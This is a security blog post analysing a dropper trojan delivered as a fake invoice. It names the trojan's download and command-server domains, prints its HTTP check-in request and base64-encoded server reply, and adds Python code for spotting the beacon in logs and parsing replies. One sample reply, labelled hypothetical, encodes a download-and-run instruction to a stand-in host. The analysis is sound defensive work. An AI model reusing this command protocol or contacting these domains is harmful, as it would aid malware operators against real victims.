making it more secure 
 

We received a suspicious email today purporting to be an order confirmation from ‘element5info.com’, notifying us of an invoice for GBP 90.39, with an attached executable named INV 4946911.exe. Putting it through a dozen different anti-virus engines didn’t bring up any hits for known viruses.

It was a small (8 kB) Windows executable, which we immediately suspected was a dropper trojan. These trojans are small applications that usually make connections out to an external host to download a larger, more complex trojan. Because they are small and simple, the virus writer is able to produce many different variants and thus evade signature detection for longer.

When running the dropper in our sandbox, we observed it attempting to make an HTTP connection out to akgulati.com.
Looking at the site ourselves, we saw it returned an index page listing two more executables; the domain was registered on 2005/10/16 to a “Robert Holliday” of Orchard Park, New York (almost certainly a fake identity). The site is currently still available (as of 2006/05/19 13:00):

Parent Directory   10-May-2006 17:06    -
suhoy316.exe       12-May-2006 02:05  273k
suhoy320.exe       17-May-2006 12:02  250k

The first, suhoy316.exe, is a known virus, detected as Trojan.Agent-463 by our antivirus system. The second, suhoy320.exe, was unknown, and is most likely a more recent variant of the suhoy316 trojan.

Executing the unknown trojan on our sandbox, we saw it run, install itself, and then delete its own executable file. We couldn’t see any processes running, but when we started Internet Explorer, we saw it attempt to contact sstonn.com.

We fooled the machine into thinking it had a fully open connection to the Internet, and ran the virus again, redirecting all of its outbound connections into netcat. We saw it connect back to sstonn.com and make the following request:

GET /line/navigator.php?tid=ID20060519130754703&ver=3.20 HTTP/1.1
Accept: */*
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: sstonn.com
Connection: Keep-Alive

From a cursory look at the ‘tid’ value, it is obviously a date/time stamp: 2006/05/19 13:07:54.703, where we assume the trailing ‘703’ is the millisecond component. Running it again we never saw the ‘tid’ value change, so we assume this is the install date of the trojan rather than the current system time being sent to the server.

We see that the name of the executable, suhoy320.exe, corresponds to the ‘ver’ field in the HTTP request, 3.20. We can thus assume that suhoy316 is an earlier version (3.16) of the same trojan.
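The beacon format above (a GET to /line/navigator.php with a 17-digit ‘tid’ and a ‘ver’ field) is regular enough to match in proxy logs and to pull the install timestamp and version out of. The following is an added example, not code from the original post: it runs a matcher over a few constructed, simplified proxy-log lines (client, method, host, path) and decodes each hit. The log layout, the client addresses and the 3.16 beacon are assumptions for illustration; the 3.20 request is the one quoted above.

```python
import re
from datetime import datetime
from typing import NamedTuple, Optional

# Constructed sample lines in a simplified proxy-log layout (not real logs):
# "<client-ip> <method> <host> <path>"
SAMPLE_LOG = """\
10.0.0.12 GET sstonn.com /line/navigator.php?tid=ID20060519130754703&ver=3.20
10.0.0.12 GET www.example.org /index.html
10.0.0.31 GET sstonn.com /line/navigator.php?tid=ID20060518091200015&ver=3.16
10.0.0.44 GET sstonn.com /line/navigator.php?tid=IDnotadate&ver=3.20
"""


class Beacon(NamedTuple):
    client: str
    host: str
    installed: datetime   # decoded from the tid field
    version: str          # the ver field, e.g. "3.20"


# Match on the URL shape rather than the host, so a variant pointed at a new
# domain is still caught: tid=ID<YYYYMMDDHHMMSSmmm>&ver=<major.minor>
BEACON_RE = re.compile(
    r"/line/navigator\.php\?tid=ID(?P<tid>\d{17})&ver=(?P<ver>\d+\.\d+)$"
)


def parse_tid(tid: str) -> datetime:
    """Decode the 17-digit tid (YYYYMMDDHHMMSS followed by milliseconds)."""
    stamp = datetime.strptime(tid[:14], "%Y%m%d%H%M%S")
    return stamp.replace(microsecond=int(tid[14:17]) * 1000)


def parse_line(line: str) -> Optional[Beacon]:
    """Return a Beacon if the log line is a navigator.php check-in, else None."""
    parts = line.split()
    if len(parts) != 4:
        return None
    client, method, host, path = parts
    m = BEACON_RE.search(path)
    if method != "GET" or m is None:
        return None
    try:
        installed = parse_tid(m.group("tid"))
    except ValueError:          # digits present but not a valid date
        return None
    return Beacon(client, host, installed, m.group("ver"))


def find_beacons(log_text: str) -> list[Beacon]:
    """Scan a block of log text and collect every check-in found."""
    return [b for b in (parse_line(l) for l in log_text.splitlines()) if b]


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG):
        print(f"{b.client} -> {b.host}  v{b.version}  installed {b.installed.isoformat()}")
```

Because the tid is fixed at install time, the same value recurring from one client across days is a useful confirmation that it is this trojan checking in rather than a browser visit, and grouping hits by version shows which generation of the sample a site has.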

Being drawn a little further into the virus now, we wanted to know what the server would have returned had the trojan been allowed to complete the request.
So we issued the request from a secured environment and saw the web server return the following:

<html>
<head>
<title>#SV#GET#COM#</title>
</head>
<body>{Tk8gQ09NQU5EUw==#{
</body>
</html>

It was immediately recognisable to us that ‘Tk8gQ09NQU5EUw==’ is a base64-encoded string. Decoding it revealed the words ‘NO COMANDS’ (sic).

We shall have to keep our eyes out for when the site changes its response to something else. Maybe ‘DoS www.microsoft.com’ or similar, or an instruction to download some other executable such as a keystroke logger or proxy.
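To watch for that change it helps to have the response framing pinned down: the title carries a ‘#SV#GET#COM#’ marker and the body wraps the base64 payload in ‘{’ … ‘#{’. The following is an added example, not code from the original post: it parses a reply in that shape, decodes the payload and flags whether it is the idle ‘NO COMANDS’ string. The first sample is the body quoted above; the second (a download instruction) and third (bad padding) are constructed, hypothetical inputs to exercise the non-idle and malformed paths, not real responses from sstonn.com.

```python
import base64
import binascii
import re
from typing import NamedTuple, Optional

# The response observed in the post.
RESPONSE_NO_COMMANDS = """<html>
<head>
<title>#SV#GET#COM#</title>
</head>
<body>{Tk8gQ09NQU5EUw==#{
</body>
</html>"""

# Constructed, hypothetical: what a non-idle reply might look like if the
# server switched to handing out a command. The command syntax is invented.
RESPONSE_HYPOTHETICAL = (
    "<html><head><title>#SV#GET#COM#</title></head><body>{"
    + base64.b64encode(b"DOWNLOAD http://example.invalid/x.exe").decode("ascii")
    + "#{</body></html>"
)

# Constructed: framing present but payload has incorrect base64 padding.
RESPONSE_BAD_PADDING = "<html><body>{Tk8gQ09NQU5EUw=#{</body></html>"

IDLE_COMMAND = "NO COMANDS"   # the server's own misspelling, matched verbatim


class C2Reply(NamedTuple):
    marker: Optional[str]   # the #...# title marker, if present
    command: str            # decoded payload text
    is_idle: bool           # True when the server has nothing for the bot


TITLE_RE = re.compile(r"<title>(#[^<]*#)</title>", re.IGNORECASE)
PAYLOAD_RE = re.compile(r"\{([A-Za-z0-9+/=]+)#\{")


def parse_c2_reply(body: str) -> Optional[C2Reply]:
    """Extract and decode the {base64#{ payload; None if absent or malformed."""
    m = PAYLOAD_RE.search(body)
    if m is None:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    t = TITLE_RE.search(body)
    marker = t.group(1) if t else None
    return C2Reply(marker, decoded, decoded == IDLE_COMMAND)


if __name__ == "__main__":
    for name, body in [("observed", RESPONSE_NO_COMMANDS),
                       ("hypothetical", RESPONSE_HYPOTHETICAL),
                       ("bad padding", RESPONSE_BAD_PADDING)]:
        print(name, "->", parse_c2_reply(body))
```

Polling the URL periodically with this parser and alerting when is_idle turns False (or the marker changes) is the practical way to catch the moment the operators push a real command, without having to eyeball the raw HTML each time.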

Following the assumption that this unrecognised executable is a variant of 'suhoy.exe', we assume it behaves similarly to this description of the trojan, which attempts to steal information from people logging into certain banking sites. Related to the larger trojan is its ‘dropper’ Clagger.I, which looks to be an older variant of our INV 4946911.exe (both droppers modify the registry in the same way).

Since first identifying the virus several hours ago, we have seen quite a few copies arriving at various sites. Still no sign of any updates from the AV vendors though. So watch out!
